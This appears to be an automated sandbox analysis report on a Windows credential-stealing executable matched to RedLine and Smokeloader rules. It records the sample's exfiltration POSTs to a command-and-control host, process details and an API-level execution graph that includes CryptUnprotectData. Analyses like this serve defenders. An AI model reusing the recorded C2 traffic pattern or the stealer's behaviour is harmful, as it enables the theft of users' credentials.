                                                                                                                                                                                                                                      2025-01-11 06:48:37 UTC12818OUTData Raw: 2d 2d 4f 47 31 33 58 57 32 56 41 36 32 48 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 41 32 43 37 41 44 38 39 43 33 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 4f 47 31 33 58 57 32 56 41 36 32 48 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 47 31 33 58 57 32 56 41 36 32 48 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4f 47 31 33 58 57 32 56 41 36 32 48 35
                                                                                                                                                                                                                                      Data Ascii: --OG13XW2VA62H57Content-Disposition: form-data; name="hwid"43A2C7AD89C30672D0632DF0E28DC412--OG13XW2VA62H57Content-Disposition: form-data; name="pid"2--OG13XW2VA62H57Content-Disposition: form-data; name="lid"4h5VfH----OG13XW2VA62H5
                                                                                                                                                                                                                                      2025-01-11 06:48:38 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Sat, 11 Jan 2025 06:48:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=1vs2nvc010eue2bkv3io64aeoo; expires=Wed, 07 May 2025 00:35:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjA7MmxR8Qj7SX%2FpaTA27Wjd1Z%2BAgiDVwfTIT7l8piNv3E%2Fcxm5Aq0X58YCwrPK91oY7BTV7C0I%2FjuIV15oXeLcKQAY6OvC8Hc8CHasRY2StTwo0Mwd5bZKjfe6orcsYQuIT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 9002f651fc3c0f36-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1471&rtt_var=554&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13754&delivery_rate=1968981&cwnd=231&unsent_bytes=0&cid=76a66f24a5664bab&ts=646&x=0"
                                                                                                                                                                                                                                      2025-01-11 06:48:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2025-01-11 06:48:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.1049734104.21.80.14437464C:\Users\user\Desktop\xNuh0DUJaG.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-11 06:48:38 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=86RQ8NVH
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 15009
                                                                                                                                                                                                                                      Host: sputnik-1985.com
                                                                                                                                                                                                                                      2025-01-11 06:48:38 UTC15009OUTData Raw: 2d 2d 38 36 52 51 38 4e 56 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 41 32 43 37 41 44 38 39 43 33 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 38 36 52 51 38 4e 56 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 36 52 51 38 4e 56 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 38 36 52 51 38 4e 56 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
                                                                                                                                                                                                                                      Data Ascii: --86RQ8NVHContent-Disposition: form-data; name="hwid"43A2C7AD89C30672D0632DF0E28DC412--86RQ8NVHContent-Disposition: form-data; name="pid"2--86RQ8NVHContent-Disposition: form-data; name="lid"4h5VfH----86RQ8NVHContent-Disposition:
                                                                                                                                                                                                                                      2025-01-11 06:48:39 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Sat, 11 Jan 2025 06:48:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=j5empeuf7983tbpqm7ungth91a; expires=Wed, 07 May 2025 00:35:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Rwk20RqJqqLkobXhFj0O4XX9SKJgQ4xqbb0V7BVl1pkt%2Fk4RjgfTMsFTXtQuG8usVYVOEEzzIMAvRsd0Se6H14egp0GnsrSzgAg5WRuCmYDCR65ahRd%2F7hPaMqaE9%2B7rmg%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 9002f659f8108c0f-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1937&min_rtt=1932&rtt_var=736&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15939&delivery_rate=1476238&cwnd=223&unsent_bytes=0&cid=dff3ebf726c4d0e4&ts=418&x=0"
                                                                                                                                                                                                                                      2025-01-11 06:48:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2025-01-11 06:48:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.1049743104.21.80.14437464C:\Users\user\Desktop\xNuh0DUJaG.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-11 06:48:40 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=I3XGM3M5HS6
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 20389
                                                                                                                                                                                                                                      Host: sputnik-1985.com
                                                                                                                                                                                                                                      2025-01-11 06:48:40 UTC15331OUTData Raw: 2d 2d 49 33 58 47 4d 33 4d 35 48 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 41 32 43 37 41 44 38 39 43 33 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 49 33 58 47 4d 33 4d 35 48 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 33 58 47 4d 33 4d 35 48 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 49 33 58 47 4d 33 4d 35 48 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                      Data Ascii: --I3XGM3M5HS6Content-Disposition: form-data; name="hwid"43A2C7AD89C30672D0632DF0E28DC412--I3XGM3M5HS6Content-Disposition: form-data; name="pid"3--I3XGM3M5HS6Content-Disposition: form-data; name="lid"4h5VfH----I3XGM3M5HS6Content-D
                                                                                                                                                                                                                                      2025-01-11 06:48:40 UTC5058OUTData Raw: 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 5c 5f f0 2b b1 64 f0 7c 3c 78
                                                                                                                                                                                                                                      Data Ascii: lpQ0/74G6(~`~O\_+d|<x
                                                                                                                                                                                                                                      2025-01-11 06:48:40 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Sat, 11 Jan 2025 06:48:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=k0jhko2a2chmltcrrvg3qqohfg; expires=Wed, 07 May 2025 00:35:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ptw6ZRmwXjxBKMuH1przlV69pxtT1LLa7MpZxwk66HAPXGgiXAh92U%2FcEp7TWPcBOb2D240NErIGiVbKSQov50mZNlF2iwoNlcjuYauaIeOGqPVoadNMhVz0fXwjGFSugMXr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 9002f6632a637d0e-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1930&min_rtt=1925&rtt_var=732&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21344&delivery_rate=1485249&cwnd=244&unsent_bytes=0&cid=49517e7dbf08a107&ts=497&x=0"
                                                                                                                                                                                                                                      2025-01-11 06:48:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2025-01-11 06:48:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                      Start time:01:48:30
                                                                                                                                                                                                                                      Start date:11/01/2025
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\xNuh0DUJaG.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\xNuh0DUJaG.exe"
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:332'800 bytes
                                                                                                                                                                                                                                      MD5 hash:9B3E0C8C483F0708B9DC9C18CE46D0BC
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                      Start time:01:48:40
                                                                                                                                                                                                                                      Start date:11/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 1804
                                                                                                                                                                                                                                      Imagebase:0x470000
                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:3.2%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:19.6%
                                                                                                                                                                                                                                        Signature Coverage:55.2%
                                                                                                                                                                                                                                        Total number of Nodes:163
                                                                                                                                                                                                                                        Total number of Limit Nodes:13
                                                                                                                                                                                                                                        execution_graph 26154 408880 26156 40888f 26154->26156 26155 408ab5 ExitProcess 26156->26155 26157 4088a4 GetCurrentProcessId GetCurrentThreadId 26156->26157 26163 408a99 26156->26163 26158 4088ca 26157->26158 26159 4088ce SHGetSpecialFolderPathW GetForegroundWindow 26157->26159 26158->26159 26160 408974 26159->26160 26164 43eb20 26160->26164 26162 4089cf 26162->26163 26163->26155 26163->26162 26167 441850 26164->26167 26166 43eb2a RtlAllocateHeap 26166->26162 26168 441870 26167->26168 26168->26166 26168->26168 26246 415720 26247 415740 26246->26247 26285 443190 26247->26285 26249 415882 26250 415ad2 26249->26250 26252 4158ab 26249->26252 26255 4158ea 26249->26255 26257 415b37 26249->26257 26293 443440 LdrInitializeThunk 26249->26293 26250->26255 26300 4402c0 LdrInitializeThunk 26250->26300 26252->26250 26252->26255 26252->26257 26294 4434d0 26252->26294 26257->26257 26258 443190 LdrInitializeThunk 26257->26258 26259 415c8d 26258->26259 26259->26255 26260 415d02 26259->26260 26261 415d3e 26259->26261 26301 443440 LdrInitializeThunk 26259->26301 26260->26261 26263 4434d0 LdrInitializeThunk 26260->26263 26275 415dbe 26261->26275 26302 4402c0 LdrInitializeThunk 26261->26302 26263->26261 26265 416498 26266 41647e 26304 419840 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26266->26304 26268 41632f 26268->26265 26270 4163b2 26268->26270 26283 4164c2 26268->26283 26269 416087 26269->26265 26269->26266 26269->26268 26303 41bba0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26270->26303 26271 41605d CryptUnprotectData 26271->26268 26271->26269 26273 416483 26273->26265 26282 41687e 26273->26282 26306 4402c0 LdrInitializeThunk 26273->26306 26275->26269 26275->26271 26277 41672c 26305 41bba0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26277->26305 26278 4168b7 26281 416bd9 26278->26281 26308 4402c0 LdrInitializeThunk 26278->26308 26282->26278 26282->26281 26307 4402c0 LdrInitializeThunk 26282->26307 26283->26255 26283->26277 26289 4432f0 26283->26289 26287 4431b0 26285->26287 26286 443298 26286->26249 26287->26286 26309 4402c0 LdrInitializeThunk 26287->26309 26291 443310 26289->26291 26290 4433ee 26290->26283 26291->26290 26310 4402c0 LdrInitializeThunk 26291->26310 26293->26252 26295 4158db 26294->26295 26296 4434e9 26294->26296 26295->26250 26295->26255 26295->26257 26296->26295 26311 4402c0 LdrInitializeThunk 26296->26311 26298 443538 26298->26295 26312 4402c0 LdrInitializeThunk 26298->26312 26300->26255 26301->26260 26302->26275 26303->26255 26304->26273 26305->26255 26306->26282 26307->26278 26308->26278 26309->26286 26310->26290 26311->26298 26312->26295 26169 43eb40 26170 43eb53 26169->26170 26171 43eb55 26169->26171 26172 43eb5a RtlFreeHeap 26171->26172 26173 480000 26176 480006 26173->26176 26177 480015 26176->26177 26180 4807a6 26177->26180 26182 4807c1 26180->26182 26181 4807ca CreateToolhelp32Snapshot 26181->26182 26183 4807e6 Module32First 26181->26183 26182->26181 26182->26183 26184 4807f5 26183->26184 26186 480005 26183->26186 26187 480465 26184->26187 26188 480490 26187->26188 26189 4804d9 26188->26189 26190 4804a1 VirtualAlloc 26188->26190 26189->26189 26190->26189 26313 40cfec 26314 40d010 26313->26314 26317 43b870 26314->26317 26316 40d175 26318 43b8b0 26317->26318 26318->26318 26319 43bc86 CoCreateInstance 26318->26319 26320 43bcda SysAllocString 26319->26320 26321 43c217 26319->26321 26324 43bd6a 26320->26324 26323 43c227 GetVolumeInformationW 26321->26323 26330 43c249 26323->26330 26325 43bd72 CoSetProxyBlanket 26324->26325 26326 43c206 SysFreeString 26324->26326 26327 43bd92 SysAllocString 26325->26327 26328 43c1fc 26325->26328 26326->26321 26331 43be80 26327->26331 26328->26326 26330->26316 26331->26331 26332 43becf SysAllocString 26331->26332 26334 43bef2 26332->26334 26333 43c1e7 SysFreeString SysFreeString 26333->26328 26334->26333 26335 43c1dd 26334->26335 26336 43bf39 VariantInit 26334->26336 26335->26333 26338 43bf90 26336->26338 26337 43c1cc VariantClear 26337->26335 26338->26337 26339 4406eb 26340 44072e 26339->26340 26341 44070c 26339->26341 26341->26340 26343 4402c0 LdrInitializeThunk 26341->26343 26343->26340 26191 40ab12 26192 40ab22 26191->26192 26193 40ab3d WSAStartup 26192->26193 26194 40df92 CoInitializeSecurity 26344 421370 26345 4213d8 26344->26345 26346 42137e 26344->26346 26350 421490 26346->26350 26351 4214a0 26350->26351 26352 4432f0 LdrInitializeThunk 26351->26352 26353 42157f 26352->26353 26195 40e3d3 CoInitializeEx CoInitializeEx 26196 442390 26198 4423b0 26196->26198 26197 442439 26198->26197 26200 4402c0 LdrInitializeThunk 26198->26200 26200->26197 26201 2100005 26206 210092b GetPEB 26201->26206 26203 2100030 26207 210003c 26203->26207 26206->26203 26208 2100049 26207->26208 26222 2100e0f SetErrorMode SetErrorMode 26208->26222 26213 2100265 26214 21002ce VirtualProtect 26213->26214 26216 210030b 26214->26216 26215 2100439 VirtualFree 26220 21004be 26215->26220 26221 21005f4 LoadLibraryA 26215->26221 26216->26215 26217 21004e3 LoadLibraryA 26217->26220 26219 21008c7 26220->26217 26220->26221 26221->26219 26223 2100223 26222->26223 26224 2100d90 26223->26224 26225 2100dad 26224->26225 26226 2100dbb GetPEB 26225->26226 26227 2100238 VirtualAlloc 26225->26227 26226->26227 26227->26213 26354 4404b1 GetForegroundWindow 26355 4404ce 26354->26355 26228 440cde 26229 440ce8 26228->26229 26230 440dae 26229->26230 26234 4402c0 LdrInitializeThunk 26229->26234 26233 4402c0 LdrInitializeThunk 26230->26233 26233->26230 26234->26230 26235 40a69b 26236 40a770 26235->26236 26236->26236 26241 40b2b0 26236->26241 26238 40a7b9 26239 40b2b0 2 API calls 26238->26239 26240 40a8d9 26239->26240 26243 40b340 26241->26243 26242 40b365 26242->26238 26243->26242 26245 440260 RtlAllocateHeap RtlFreeHeap 26243->26245 26245->26243 26361 4409b8 26362 4409d0 26361->26362 26363 440a3e 26362->26363 26367 4402c0 LdrInitializeThunk 26362->26367 26365 440a8e 26363->26365 26368 4402c0 LdrInitializeThunk 26363->26368 26367->26363 26368->26365

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 0043B870 Relevance: 37.6, APIs: 11, Strings: 10, Instructions: 880memorycomCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 43b870-43b8af 1 43b8b0-43b95c 0->1 1->1 2 43b962-43b97f 1->2 3 43b980-43b9a4 2->3 3->3 4 43b9a6-43b9ef 3->4 5 43b9f0-43ba04 4->5 5->5 6 43ba06-43ba28 5->6 8 43bb5b-43bb6f 6->8 9 43ba2e-43ba46 6->9 11 43bb70-43bb8a 8->11 10 43ba50-43bae4 9->10 10->10 12 43baea-43bb0f 10->12 11->11 13 43bb8c-43bbef 11->13 14 43bb10-43bb3e 12->14 15 43bbf0-43bc11 13->15 14->14 16 43bb40-43bb57 14->16 15->15 17 43bc13-43bc6f 15->17 16->8 18 43bc70-43bc84 17->18 18->18 19 43bc86-43bcd4 CoCreateInstance 18->19 20 43c217-43c247 call 441c40 GetVolumeInformationW 19->20 21 43bcda-43bd1f 19->21 26 43c251-43c253 20->26 27 43c249-43c24d 20->27 23 43bd20-43bd3f 21->23 23->23 24 43bd41-43bd6c SysAllocString 23->24 30 43bd72-43bd8c CoSetProxyBlanket 24->30 31 43c206-43c213 SysFreeString 24->31 29 43c26d-43c274 26->29 27->26 32 43c276-43c27d 29->32 33 43c28d-43c2af 29->33 35 43bd92-43bdb2 30->35 36 43c1fc-43c202 30->36 31->20 32->33 37 43c27f-43c28b 32->37 34 43c2b0-43c2c4 33->34 34->34 38 43c2c6-43c309 34->38 39 43bdc0-43bde6 35->39 36->31 37->33 40 43c310-43c351 38->40 39->39 41 43bde8-43be72 SysAllocString 39->41 40->40 42 43c353-43c37f call 41dcb0 40->42 43 43be80-43becd 41->43 47 43c380-43c388 42->47 43->43 45 43becf-43bef7 SysAllocString 43->45 50 43c1e7-43c1f8 SysFreeString * 2 45->50 51 43befd-43bf1f 45->51 47->47 49 43c38a-43c38c 47->49 52 43c392-43c3a2 call 4081e0 49->52 53 43c260-43c267 49->53 50->36 58 43bf25-43bf28 51->58 59 43c1dd-43c1e3 51->59 52->53 53->29 55 43c3a7-43c3ae 53->55 58->59 60 43bf2e-43bf33 58->60 59->50 60->59 61 43bf39-43bf89 VariantInit 60->61 62 43bf90-43bfaf 61->62 62->62 63 43bfb1-43bfc2 62->63 64 43bfc6-43bfcb 63->64 65 43bfd1-43bfd7 64->65 66 43c1cc-43c1d9 VariantClear 64->66 65->66 67 43bfdd-43bfea 65->67 66->59 68 43c033 67->68 69 43bfec-43bff1 67->69 70 43c035-43c04f call 408160 68->70 71 43c00c-43c010 69->71 79 43c055-43c05f 70->79 80 43c17e-43c18f 70->80 73 43c012-43c01d 71->73 74 43c000 71->74 77 43c026-43c02c 73->77 78 43c01f-43c024 73->78 76 43c001-43c00a 74->76 76->70 76->71 77->76 81 43c02e-43c031 77->81 78->76 79->80 82 43c065-43c06f 79->82 83 43c191 80->83 84 43c196-43c1a2 80->84 81->76 85 43c070-43c07e 82->85 83->84 86 43c1a4 84->86 87 43c1a9-43c1c9 call 408190 call 408170 84->87 88 43c090-43c096 85->88 89 43c080-43c085 85->89 86->87 87->66 92 43c098-43c09b 88->92 93 43c0bd-43c0c9 88->93 91 43c130-43c134 89->91 99 43c136-43c13c 91->99 92->93 95 43c09d-43c0bb 92->95 96 43c0cb-43c0ce 93->96 97 43c148-43c150 93->97 95->91 96->97 101 43c0d0-43c121 96->101 97->99 100 43c152-43c155 97->100 99->80 103 43c13e-43c140 99->103 105 43c157-43c178 100->105 106 43c17a-43c17c 100->106 101->91 103->85 104 43c146 103->104 104->80 105->91 106->91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
                                                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0043BF3E
                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043C243
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
